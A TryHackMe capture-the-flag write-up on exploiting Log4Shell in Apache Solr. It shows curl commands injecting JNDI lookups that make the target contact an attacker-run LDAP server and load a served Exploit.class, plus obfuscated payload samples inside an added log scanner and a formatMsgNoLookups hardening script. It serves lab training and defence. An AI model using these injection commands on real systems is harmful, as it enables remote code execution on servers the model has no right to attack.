TryHackMe Solar Write Up | Exploiting log4j

CVE-2021-44228 Apache Solr 8.11.1

Start with a full TCP port scan, default scripts and version detection:

┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ nmap solar.thm -p- -sC -sV

What service is running on port 8983? (Just the name of the software)

Apache Solr

Open the service running on port 8983 in your browser:

┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ firefox http://solar.thm:8983
SOLR GUI

What is the -Dsolr.log.dir argument set to, displayed on the front page?

/var/solr/logs

Which file contains this repeated entry? (Just the filename itself, no path needed)

solr.log

What “path” or URL endpoint is indicated in these repeated entries?

/admin/cores

Viewing these log entries, what field name indicates some data entrypoint that you as a user could control? (Just the field name)

params

Inject a JNDI lookup through that parameter while a listener (for example nc -lnvp 9999) waits on port 9999 of your attacking machine; an inbound connection to it proves the lookup was evaluated by log4j:

┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ curl 'http://solar.thm:8983/solr/admin/cores?foo=$\{jndi:ldap://10.8.154.49:9999\}'

What is the output of running this command? (You should leave this terminal window open as it will be actively awaiting connections)

Listening on 0.0.0.0:1389

That is the rogue LDAP referral server (marshalsec's LDAPRefServer in the room) that will answer the JNDI lookup with a reference to an Exploit class fetched over HTTP. In a second terminal, serve the compiled Exploit.class from the directory that contains it (http.server listens on port 8000 by default):

┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ python3 -m http.server

Then trigger the lookup again, this time pointing the JNDI URL at the LDAP server on 1389 and naming the class:

┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ curl 'http://10.10.29.51:8983/solr/admin/cores?foo=$\{jndi:ldap://10.10.82.86:1389/Exploit\}'
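The defender's side of the same log analysis, as an added example that is not part of the TryHackMe room or this write-up: a small POSIX shell scanner that reads solr.log-style lines, unwraps the two lookup obfuscations most often seen in the wild (${lower:j}/${upper:J} and ${::-j} style fragments), flags lines containing a JNDI lookup, and extracts the callback target. SAMPLE_LOG is constructed to mirror the path=/admin/cores ... params={...} entries the write-up points at; its IPs and timestamps are made up.

```shell
#!/bin/sh
# Added example (not from the TryHackMe room or this write-up): hunt for
# Log4Shell lookup attempts in Solr request-log lines and pull out the
# callback target. SAMPLE_LOG is a constructed stand-in for solr.log.

SAMPLE_LOG='2021-12-13 10:00:01.000 INFO  (qtp1-12) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={indexInfo=false&wt=json} status=0 QTime=2
2021-12-13 10:00:02.000 INFO  (qtp1-12) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${jndi:ldap://10.8.154.49:9999/a}} status=0 QTime=2
2021-12-13 10:00:03.000 INFO  (qtp1-12) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${${lower:j}ndi:${lower:l}dap://10.8.154.49:1389/Exploit}} status=0 QTime=2
2021-12-13 10:00:04.000 INFO  (qtp1-12) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${${::-j}${::-n}${::-d}${::-i}:rmi://10.8.154.49:1099/x}} status=0 QTime=2
2021-12-13 10:00:05.000 INFO  (qtp1-12) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={indexInfo=false&wt=json} status=0 QTime=2'

# sed program that unwraps one nesting level of the common obfuscations:
#   ${lower:X} / ${upper:X}  -> X
#   ${anything:-X}           -> X   (covers ${::-j}, ${env:NOPE:-j}, ...)
# The [^${}] class keeps a match from starting at an outer "${" and
# swallowing the inner lookup together with it.
UNWRAP='s/\$\{(lower|upper):([^$}]+)\}/\2/g; s/\$\{[^${}]*:-([^$}]+)\}/\1/g'

# Lower-case the line, then apply UNWRAP twice so depth-two nesting
# (the payload shapes above) collapses to a literal "${jndi:".
normalize_line() {
  printf '%s\n' "$1" | tr 'A-Z' 'a-z' | sed -E "$UNWRAP" | sed -E "$UNWRAP"
}

# Exit 0 when the normalized line carries a JNDI lookup, 1 otherwise.
is_log4shell() {
  normalize_line "$1" | grep -qF '${jndi:'
}

# Print scheme://host:port of the first lookup target in the line (if any).
callback_host() {
  normalize_line "$1" \
    | grep -oE '(ldaps?|rmi|dns|iiop|corba|nds|http)://[^/}[:space:]]+' \
    | head -n 1
}

# Read log lines on stdin; print "<line-no>  <target>  <raw line>" per hit.
scan_log() {
  n=0
  while IFS= read -r line; do
    n=$((n + 1))
    if is_log4shell "$line"; then
      printf '%s\t%s\t%s\n' "$n" "$(callback_host "$line")" "$line"
    fi
  done
}

# Usage on the constructed sample (on a real host: scan_log < /var/solr/logs/solr.log).
printf '%s\n' "$SAMPLE_LOG" | scan_log
```

Normalizing before matching is the point: a naive grep for the literal string ${jndi: catches only the first probe above and misses the two obfuscated ones, and the extracted target is what you pivot on when hunting across other hosts' logs.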

What is the full path of the specific solr.in.sh file?

/etc/default/solr.in.sh
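The stopgap the room applies in that file is to pass -Dlog4j2.formatMsgNoLookups=true to Solr's JVM through SOLR_OPTS. As an added example that is not the room's or the write-up's own code, the script below applies that setting to a copy of solr.in.sh idempotently and checks that an uncommented line really sets it, since a naive grep is fooled by a commented-out option. The sample file contents and temp file are constructed; on a real host you would call harden_solr_in_sh /etc/default/solr.in.sh and restart Solr. Caveat a practitioner needs: the property only exists in Log4j 2.10 through 2.14.1, and CVE-2021-45046 showed it is not a complete fix in every configuration, so the durable remediation is upgrading log4j-core (2.17.1 or later on Java 8); treat the flag as a bridge, not the endpoint.

```shell
#!/bin/sh
# Added example (not from the TryHackMe room or this write-up): apply the
# log4j "no lookups" stopgap to solr.in.sh once, and verify it took.
# Paths and file contents below are constructed for a stand-alone run.

NOLOOKUPS_LINE='SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"'

# Constructed stand-in for a stock /etc/default/solr.in.sh: the only
# mention of the option is commented out, so Solr starts vulnerable.
make_sample_solr_in_sh() {
  cat > "$1" <<'EOF'
# Constructed sample solr.in.sh (mirrors the stock file's style)
SOLR_JAVA_MEM="-Xms512m -Xmx512m"
SOLR_LOGS_DIR=/var/solr/logs
#SOLR_OPTS="$SOLR_OPTS -Dsolr.autoSoftCommit.maxTime=3000"
#SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"
EOF
}

# Exit 0 only if an UNCOMMENTED SOLR_OPTS line sets formatMsgNoLookups=true.
has_nolookups() {
  grep -Eq '^[[:space:]]*SOLR_OPTS=.*-Dlog4j2\.formatMsgNoLookups=true' "$1"
}

# Append the directive once and report what happened ("added"/"already-set").
# Appending keeps any SOLR_OPTS the file already builds up, because the new
# line re-uses "$SOLR_OPTS".
harden_solr_in_sh() {
  if has_nolookups "$1"; then
    echo "already-set"
  else
    printf '\n# Log4Shell (CVE-2021-44228) stopgap: disable message lookups\n%s\n' \
      "$NOLOOKUPS_LINE" >> "$1"
    echo "added"
  fi
}

# How many active lines set the flag; stays 1 however often harden runs.
nolookups_count() {
  grep -Ec '^[[:space:]]*SOLR_OPTS=.*-Dlog4j2\.formatMsgNoLookups=true' "$1"
}

# Demo on a temporary copy (constructed); never run make_sample_* on the real file.
DEMO_FILE=$(mktemp)
make_sample_solr_in_sh "$DEMO_FILE"
harden_solr_in_sh "$DEMO_FILE"   # prints: added
harden_solr_in_sh "$DEMO_FILE"   # prints: already-set
echo "active formatMsgNoLookups lines: $(nolookups_count "$DEMO_FILE")"
rm -f "$DEMO_FILE"
# After editing the real file and restarting Solr, confirm the JVM picked it up:
#   ps -o args= -C java | grep -o 'log4j2.formatMsgNoLookups=[a-z]*'
```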

https://tryhackme.com/room/solar
